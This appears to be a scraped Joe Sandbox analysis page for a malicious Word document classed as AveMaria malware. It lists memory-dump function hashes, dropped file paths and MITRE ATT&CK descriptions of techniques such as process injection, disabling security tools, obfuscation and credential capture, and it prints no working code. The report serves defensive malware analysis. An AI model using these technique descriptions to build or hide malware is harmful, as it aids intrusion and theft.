Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da1cd89f5e7bb5ae514263a476a35c7ed1cfd3016f97c4b01dbc789ca4c2fba
Instruction ID: 8ec09be1aa7defa8330f61206b7f230cada444ccdc9bb83a15b84d4da57173a3
Opcode Fuzzy Hash: 6da1cd89f5e7bb5ae514263a476a35c7ed1cfd3016f97c4b01dbc789ca4c2fba
Instruction Fuzzy Hash: 9FE086B094110CDBCF55EFF0C912A7EB378EB86208F10186D960AA3291DF364E40E659

Uniqueness

Uniqueness Score: -1.00%

Function 001F15FF Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0f1e38049825c6915aaaa3a8e2b3fc423cf7d5ee8c6083d949a449349b747f
Instruction ID: e2a5413a965f052eee254b9b62e463a9d91ffbc2ca67265742502494a6eb8054
Opcode Fuzzy Hash: 0c0f1e38049825c6915aaaa3a8e2b3fc423cf7d5ee8c6083d949a449349b747f
Instruction Fuzzy Hash: 98E01A7180E388AFC742DBB0E854699BBB8DB97200F0419EAD485D32A2DA211A85C751

Uniqueness

Uniqueness Score: -1.00%

Function 001F9C32 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 724b829a553657a2553ad369393017ac8a296efc555580c9df544c87d94cec2f
Instruction ID: ea3418e5e046bd5393912d56d2b995fc12b2895e54a074b70848fa1a666c7edf
Opcode Fuzzy Hash: 724b829a553657a2553ad369393017ac8a296efc555580c9df544c87d94cec2f
Instruction Fuzzy Hash: C9F0C974E04108AFCB44DFA8D9916EDBBF0EF89214F1481AAC818D3341D7315A46DF81

Uniqueness

Uniqueness Score: -1.00%

Function 05507450 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1034247432.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5500000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a27188c825707e1dc802a205d2f7519392612f940fc1f2577b4590914ba0a42f
Instruction ID: f2a3b56ebfe271a02f7310fc9ad3eb9c513fce1f1bc51e5c25cb45e8f1ab7ee4
Opcode Fuzzy Hash: a27188c825707e1dc802a205d2f7519392612f940fc1f2577b4590914ba0a42f
Instruction Fuzzy Hash: 83F0A03480D2889FCB01CFA4D99459CBF70BF46214F2480DEC84057392C6320956CB41

Uniqueness

Uniqueness Score: -1.00%

Function 001F25E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5b628ae2ebb26ecbc73f73947c4f1e24ef72606c841e26871adc1c95e133f22
Instruction ID: b366610b13b5392aed280801e154231181cec0f2d8ee8356d6ecf09057e92e1e
Opcode Fuzzy Hash: b5b628ae2ebb26ecbc73f73947c4f1e24ef72606c841e26871adc1c95e133f22
Instruction Fuzzy Hash: B1F03970E49288AFCB45DFB8E85469CBFB0EB46301F1481EAD808E3352D7340A54DF05

Uniqueness

Uniqueness Score: -1.00%

Function 05506119 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1034247432.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5500000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b442f9f87bb56920e800eed3db0f6f1646d61d8f7329ed4faf3b61eb038d540
Instruction ID: 7aba0e6865b6979ebeaa52c226f9a8a947a916aebee3e5f22f14d0ea10d9015e
Opcode Fuzzy Hash: 8b442f9f87bb56920e800eed3db0f6f1646d61d8f7329ed4faf3b61eb038d540
Instruction Fuzzy Hash: E1E06D308093889FC701DBB4D84529CBFF4AF42201F0444EEC88993292E7705A48DB52

Uniqueness

Uniqueness Score: -1.00%

Function 001F94BB Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12c4af261d887b8c291012709a90e573d4eccaf996cc4ab3ad0fa933dc8029f6
Instruction ID: b372a6f549217d903288eb23f8da2e21d90e635f4e6fa08834dca6d2d41cf861
Opcode Fuzzy Hash: 12c4af261d887b8c291012709a90e573d4eccaf996cc4ab3ad0fa933dc8029f6
Instruction Fuzzy Hash: B6E06DB1A0E60ECFCB51EF68CC408ED7BB8FB193047908C99D10497386EB3058068B90

Uniqueness

Uniqueness Score: -1.00%

Function 001F0718 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2267e076ed401a118041ad62769faa4f51fa6ceb367ff006db2d9759ce753aa0
Instruction ID: 3cc1df5194a533fa6dc0af21103c1ee978295439e9fbf59defc431cb9d3b65dd
Opcode Fuzzy Hash: 2267e076ed401a118041ad62769faa4f51fa6ceb367ff006db2d9759ce753aa0
Instruction Fuzzy Hash: 24E08C3040C2889FC3439BF4A8143A9BF788B4B601F0804E6D0C887162C7311E89D755

Uniqueness

Uniqueness Score: -1.00%

Function 05506380 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1034247432.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5500000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e757a5665e964b480e3f6bea6f76aa50cd1520e58b1d0342ce830fffae2bb7
Instruction ID: b74c849310eb503a68d146993793b8a8787af664949c1584f6a025a013bdb142
Opcode Fuzzy Hash: e5e757a5665e964b480e3f6bea6f76aa50cd1520e58b1d0342ce830fffae2bb7
Instruction Fuzzy Hash: F8E0C274E04208EFCB44DFA8D940A9CFBF4FB88304F10C0AA9818A3341D731AA51DF80

Uniqueness

Uniqueness Score: -1.00%

Function 001F2BBE Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b413bb50f2c3e90d82ece75c2a15ebc3e84ebc5d6f55185f37d03c3b397fc82
Instruction ID: 57fc5d21f9b77e5b1d7c70e22a41867df76670772d04739f6ac7a876a7383236
Opcode Fuzzy Hash: 8b413bb50f2c3e90d82ece75c2a15ebc3e84ebc5d6f55185f37d03c3b397fc82
Instruction Fuzzy Hash: 17E01739B4801DCBCF08CFD8D8408FDF3B8FB59314B255811DA0DA7605D330A9059B50

Uniqueness

Uniqueness Score: -1.00%

Function 001F9C38 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f9a2b031ac2c3d55d917ea51262b8bb1e21e7255d99976841407c8d9b94f30f
Instruction ID: 24455dae8310074ae8b48c60954333efbf6120e4cd53073773bcd2c92b5604bf
Opcode Fuzzy Hash: 8f9a2b031ac2c3d55d917ea51262b8bb1e21e7255d99976841407c8d9b94f30f
Instruction Fuzzy Hash: 45E07574E04208AFCB44DFA9D9456ADFBF4EB89304F1481A9981893341D7359A51DF81

Uniqueness

Uniqueness Score: -1.00%

Function 055003A8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1034247432.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5500000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb0ece61fd69e137a45a4b8fb091a28851aa23b9a73bd6e9a64c568e258e5ba7
Instruction ID: 15363b938976156d3a8b0b7aaebcdb5aca996448b364b44602103a9512860e54
Opcode Fuzzy Hash: cb0ece61fd69e137a45a4b8fb091a28851aa23b9a73bd6e9a64c568e258e5ba7
Instruction Fuzzy Hash: AAF098349042A8CFDB21CF54CD4CBDABBB1BB06305F5494D6D509AB291C7748A84DF61

Uniqueness

Uniqueness Score: -1.00%

Function 001F25F0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba14c7a1f4e301ff4812adcde27a55c0d88d59100b009f4171dae90a04626a7
Instruction ID: 04c65ecbb51721ce858fab78415c57502d63651c35546f9d9eeec97a882a4de5
Opcode Fuzzy Hash: 3ba14c7a1f4e301ff4812adcde27a55c0d88d59100b009f4171dae90a04626a7
Instruction Fuzzy Hash: 22E0B674D0424CEFCB44DFE8E8446ADBBF4EB49305F1081AAD818A3350EB345A90DF81

Uniqueness

Uniqueness Score: -1.00%

Function 05509930 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1034247432.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5500000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 041bf8c14c6f808be3fdadaa9fe6584edda9054442ddefc8a5ae7d7ca94801bd
Instruction ID: 2c534c0441bf53b2dc0a96a02f7e54574aab862dc039a16e8c6e8ba95a41b260
Opcode Fuzzy Hash: 041bf8c14c6f808be3fdadaa9fe6584edda9054442ddefc8a5ae7d7ca94801bd
Instruction Fuzzy Hash: 24E01A74D04208AFCB04DF94D541AACFBB4FB89314F14C0AADC4463381C7319A51DB84

Uniqueness

Uniqueness Score: -1.00%

Function 001F71E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a016affd07a70d090c249860bb687a77f654deb2910e9a28d6298386f149b9f
Instruction ID: 94f11c210cdb344d6d15f93a63a8cb7098ee71a0740298ab16bc1718cee4017d
Opcode Fuzzy Hash: 6a016affd07a70d090c249860bb687a77f654deb2910e9a28d6298386f149b9f
Instruction Fuzzy Hash: 48D0C23480814CEBCB04DFE4C8045EAB7FCEB0A205F1001A5C60883261EF300E84D791

Uniqueness

Uniqueness Score: -1.00%

Function 05506AA8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1034247432.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5500000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d9fc7a50ad072e9584460dcefd5c1a69da7d5c8fca830cf93010aac6e02f0b
Instruction ID: f92986bda8c94793b0cc970c7dd7b3e036e2c8678fa3804adee30906ed0aef7b
Opcode Fuzzy Hash: e8d9fc7a50ad072e9584460dcefd5c1a69da7d5c8fca830cf93010aac6e02f0b
Instruction Fuzzy Hash: EAE08C34904208EBCB04EF94D940AACFBB4FB85314F24C0A9DC0423381C732AEA2DA84

Uniqueness

Uniqueness Score: -1.00%

Function 05506128 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1034247432.0000000005500000.00000040.00000800.00020000.00000000.sdmp, Offset: 05500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_5500000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a078acb5bba2669decbd5a2fe8ccaf9e017d27581ad77573f6df38cd981526d
Instruction ID: f7147e3784439f5da7d435a0e4276a03f54756c1727f2d49819e32088d6617a0
Opcode Fuzzy Hash: 3a078acb5bba2669decbd5a2fe8ccaf9e017d27581ad77573f6df38cd981526d
Instruction Fuzzy Hash: A0E0EC709152089FCB44DFA8D94569CBBF4AB05205F1040A9880893351E7705A94DB81

Uniqueness

Uniqueness Score: -1.00%

Function 001F27B9 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4c1bb3ef42178a8a089f31251a40854423d21ede4f91c37803875379bdb6c7a
Instruction ID: f365a121a6513a234f2958fc17835afd8b6615cb6f1a134fbef5a279d529654c
Opcode Fuzzy Hash: d4c1bb3ef42178a8a089f31251a40854423d21ede4f91c37803875379bdb6c7a
Instruction Fuzzy Hash: CAD05E34D4C648CFDB08DFF680415FDBFB9AF69300B26912DC469A7622D33041458F01

Uniqueness

Uniqueness Score: -1.00%

Function 001F15D8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a615eb4f039d0d0f6a06e7d048c24150966c620a565bf7a5b223e0610c5264d4
Instruction ID: 1a9b74245bc33b7f84078640e0c1e8cd5c18c45e5341fc2b49ba9b906062f284
Opcode Fuzzy Hash: a615eb4f039d0d0f6a06e7d048c24150966c620a565bf7a5b223e0610c5264d4
Instruction Fuzzy Hash: CED0C9B080520C9BC704AFE4BA0926CBB78A783306F1041A9E80922660DB7046D4A6A6

Uniqueness

Uniqueness Score: -1.00%

Function 001F0728 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb3e63cab7b67478725c116626388b86bcda8304d5061676edca197f9226b077
Instruction ID: dcc8122402cb08665371e2ed2871f0caa1acfb47d6efad3ef6c7f6146d4ee2bf
Opcode Fuzzy Hash: eb3e63cab7b67478725c116626388b86bcda8304d5061676edca197f9226b077
Instruction Fuzzy Hash: F1D0127080420CDBD705DFD4EC0976DF77CD74B606F100199A50853661DB715D90DA95

Uniqueness

Uniqueness Score: -1.00%

Function 001F1C40 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1029032924.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1f0000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a03ecafc15ec44bd7337ad7cabf286b494452b0e96937f4a8a3835476f7d16fe
Instruction ID: 5b9a5949dea1b5fe8d192d2ba0b7a4cbb47f93d85bdda9e0323f91f09e503554
Opcode Fuzzy Hash: a03ecafc15ec44bd7337ad7cabf286b494452b0e96937f4a8a3835476f7d16fe
Instruction Fuzzy Hash: BCD06774E1920DEFCF14CFA9D494ABDBBB4FF09300B20501AA915E3211D7309940DF40

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: AveMaria

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\177069AF.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA1522E6.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{146C24E6-EE9A-4BF4-BC74-016BA7AD9293}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CEE7D2D-9EE4-4FEB-932A-E7FDD2AB9079}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CD169163-57D1-49B2-967A-20BA2BE15787}.tmp

C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT

C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT:Zone.Identifier

Windows Analysis Report
Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
